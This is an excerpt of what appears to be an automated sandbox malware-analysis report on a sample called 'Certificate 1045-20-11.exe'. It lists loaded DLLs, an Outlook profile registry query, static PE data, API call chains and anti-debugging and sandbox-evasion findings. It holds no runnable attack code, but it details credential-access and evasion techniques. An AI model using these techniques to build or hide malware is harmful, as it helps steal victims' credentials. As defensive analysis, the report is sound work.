            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: Certificate 1045-20-11.exeStatic file information: File size 1196032 > 1048576
            Source: Certificate 1045-20-11.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: Certificate 1045-20-11.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: Certificate 1045-20-11.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: Certificate 1045-20-11.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Certificate 1045-20-11.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: Certificate 1045-20-11.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: Certificate 1045-20-11.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: FGcoivYXQsEMNANuoDkk.exe, 00000002.00000002.4165025398.000000000017E000.00000002.00000001.01000000.00000004.sdmp, FGcoivYXQsEMNANuoDkk.exe, 00000007.00000002.4165156204.000000000017E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: Certificate 1045-20-11.exe, 00000000.00000003.1715042860.0000000003430000.00000004.00001000.00020000.00000000.sdmp, Certificate 1045-20-11.exe, 00000000.00000003.1719350842.0000000003620000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1871034857.0000000003100000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1778975404.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1871034857.000000000329E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1780442944.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000003.1871465604.000000000312E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4167728564.000000000347E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4167728564.00000000032E0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000003.1868746207.0000000002F34000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Certificate 1045-20-11.exe, 00000000.00000003.1715042860.0000000003430000.00000004.00001000.00020000.00000000.sdmp, Certificate 1045-20-11.exe, 00000000.00000003.1719350842.0000000003620000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1871034857.0000000003100000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1778975404.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1871034857.000000000329E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1780442944.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000003.00000003.1871465604.000000000312E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4167728564.000000000347E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4167728564.00000000032E0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000003.1868746207.0000000002F34000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000001.00000002.1869223621.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1837507725.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, FGcoivYXQsEMNANuoDkk.exe, 00000002.00000002.4165898672.00000000008D8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000003.00000002.4168533677.000000000390C000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4165640004.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, FGcoivYXQsEMNANuoDkk.exe, 00000007.00000002.4167257692.000000000269C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2165142022.00000000051EC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000003.00000002.4168533677.000000000390C000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4165640004.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, FGcoivYXQsEMNANuoDkk.exe, 00000007.00000002.4167257692.000000000269C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2165142022.00000000051EC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000001.00000002.1869223621.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1837507725.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, FGcoivYXQsEMNANuoDkk.exe, 00000002.00000002.4165898672.00000000008D8000.00000004.00000020.00020000.00000000.sdmp
            Source: Certificate 1045-20-11.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: Certificate 1045-20-11.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: Certificate 1045-20-11.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: Certificate 1045-20-11.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: Certificate 1045-20-11.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_0085E01E LoadLibraryA,GetProcAddress,0_2_0085E01E
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_0086C09E push esi; ret 0_2_0086C0A0
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_0086C187 push edi; ret 0_2_0086C189
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_008AC8BC push esi; ret 0_2_008AC8BE
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_00866B05 push ecx; ret 0_2_00866B18
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_0088B2B1 push FFFFFF8Bh; iretd 0_2_0088B2B3
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_0086BDAA push edi; ret 0_2_0086BDAC
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_0086BEC3 push esi; ret 0_2_0086BEC5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0253E2BA push 00000038h; iretd 1_2_0253E2BE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_025248A9 push esp; ret 1_2_025248AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_025217E5 push ebp; retf 003Fh1_2_025217E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02523780 push eax; ret 1_2_02523782
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_025347A2 push es; iretd 1_2_025347AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0253A436 push ebx; iretd 1_2_0253A600
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02538C92 pushad ; retf 1_2_02538C93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0253A5D9 push ebx; iretd 1_2_0253A600
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031309AD push ecx; mov dword ptr [esp], ecx1_2_031309B6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_032E225F pushad ; ret 3_2_032E27F9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_032E27FA pushad ; ret 3_2_032E27F9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033109AD push ecx; mov dword ptr [esp], ecx3_2_033109B6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_032E283D push eax; iretd 3_2_032E2858
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_032E1368 push eax; iretd 3_2_032E1369
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_00770CE1 pushfd ; retf 3_2_00770D0B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_00762238 pushad ; iretd 3_2_00762239
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0076AB37 push 00000038h; iretd 3_2_0076AB3B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_00766CB3 push ebx; iretd 3_2_00766E7D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_00766E56 push ebx; iretd 3_2_00766E7D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_00751126 push esp; ret 3_2_00751127
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0076D1B0 push es; ret 3_2_0076D1D0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0076550F pushad ; retf 3_2_00765510
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0076FEF5 push FFFFFFBAh; ret 3_2_0076FEF7
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0075FFA0 push esi; iretd 3_2_0075FFA5
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_008A8111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_008A8111
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_0085EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0085EB42
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_0086123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0086123A
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeAPI/Special instruction interceptor: Address: EB0DAC
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AD1C0 rdtsc 1_2_031AD1C0
            Source: C:\Windows\SysWOW64\netbtugc.exeWindow / User API: threadDelayed 3279Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeWindow / User API: threadDelayed 6694Jump to behavior
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeEvaded block: after key decisiongraph_0-94329
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-94869
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeAPI coverage: 4.6 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.8 %
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI coverage: 2.7 %
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 3704Thread sleep count: 3279 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 3704Thread sleep time: -6558000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 3704Thread sleep count: 6694 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 3704Thread sleep time: -13388000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe TID: 1344Thread sleep time: -65000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe TID: 1344Thread sleep count: 34 > 30Jump to behavior
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe TID: 1344Thread sleep time: -34000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_00886CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00886CA9
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_008860DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_008860DD
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_008863F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_008863F9
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_0088EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0088EB60
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_0088F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0088F5FA
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_0088F56F FindFirstFileW,FindClose,0_2_0088F56F
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_00891B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00891B2F
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_00891C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00891C8A
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_00891F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00891F94
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0076BAB0 FindFirstFileW,FindNextFileW,FindClose,3_2_0076BAB0
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_0085DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0085DDC0
            Source: netbtugc.exe, 00000003.00000002.4165640004.0000000002E3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllr
            Source: firefox.exe, 00000008.00000002.2168495086.000001CC0512B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
            Source: FGcoivYXQsEMNANuoDkk.exe, 00000007.00000002.4166318731.0000000000870000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllH
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeAPI call chain: ExitProcess graph end nodegraph_0-93560
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeAPI call chain: ExitProcess graph end nodegraph_0-94619
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AD1C0 rdtsc 1_2_031AD1C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02537823 LdrLoadDll,1_2_02537823
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_00896AAF BlockInput,0_2_00896AAF
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_00843D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00843D19
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_00873920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_00873920
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_0085E01E LoadLibraryA,GetProcAddress,0_2_0085E01E
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_00EB1078 mov eax, dword ptr fs:[00000030h]0_2_00EB1078
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_00EB1018 mov eax, dword ptr fs:[00000030h]0_2_00EB1018
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_00EAF9C8 mov eax, dword ptr fs:[00000030h]0_2_00EAF9C8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312C310 mov ecx, dword ptr fs:[00000030h]1_2_0312C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03150310 mov ecx, dword ptr fs:[00000030h]1_2_03150310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B930B mov eax, dword ptr fs:[00000030h]1_2_031B930B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B930B mov eax, dword ptr fs:[00000030h]1_2_031B930B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B930B mov eax, dword ptr fs:[00000030h]1_2_031B930B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316A30B mov eax, dword ptr fs:[00000030h]1_2_0316A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316A30B mov eax, dword ptr fs:[00000030h]1_2_0316A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316A30B mov eax, dword ptr fs:[00000030h]1_2_0316A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03127330 mov eax, dword ptr fs:[00000030h]1_2_03127330
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F132D mov eax, dword ptr fs:[00000030h]1_2_031F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F132D mov eax, dword ptr fs:[00000030h]1_2_031F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315F32A mov eax, dword ptr fs:[00000030h]1_2_0315F32A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03129353 mov eax, dword ptr fs:[00000030h]1_2_03129353
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03129353 mov eax, dword ptr fs:[00000030h]1_2_03129353
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B035C mov eax, dword ptr fs:[00000030h]1_2_031B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B035C mov eax, dword ptr fs:[00000030h]1_2_031B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B035C mov eax, dword ptr fs:[00000030h]1_2_031B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B035C mov ecx, dword ptr fs:[00000030h]1_2_031B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B035C mov eax, dword ptr fs:[00000030h]1_2_031B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B035C mov eax, dword ptr fs:[00000030h]1_2_031B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031FA352 mov eax, dword ptr fs:[00000030h]1_2_031FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]1_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]1_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]1_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]1_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]1_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]1_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]1_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]1_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]1_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]1_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]1_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]1_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]1_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]1_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]1_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312D34C mov eax, dword ptr fs:[00000030h]1_2_0312D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312D34C mov eax, dword ptr fs:[00000030h]1_2_0312D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03205341 mov eax, dword ptr fs:[00000030h]1_2_03205341
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D437C mov eax, dword ptr fs:[00000030h]1_2_031D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03137370 mov eax, dword ptr fs:[00000030h]1_2_03137370
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03137370 mov eax, dword ptr fs:[00000030h]1_2_03137370
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03137370 mov eax, dword ptr fs:[00000030h]1_2_03137370
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031EF367 mov eax, dword ptr fs:[00000030h]1_2_031EF367
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0318739A mov eax, dword ptr fs:[00000030h]1_2_0318739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0318739A mov eax, dword ptr fs:[00000030h]1_2_0318739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03128397 mov eax, dword ptr fs:[00000030h]1_2_03128397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03128397 mov eax, dword ptr fs:[00000030h]1_2_03128397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03128397 mov eax, dword ptr fs:[00000030h]1_2_03128397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312E388 mov eax, dword ptr fs:[00000030h]1_2_0312E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312E388 mov eax, dword ptr fs:[00000030h]1_2_0312E388
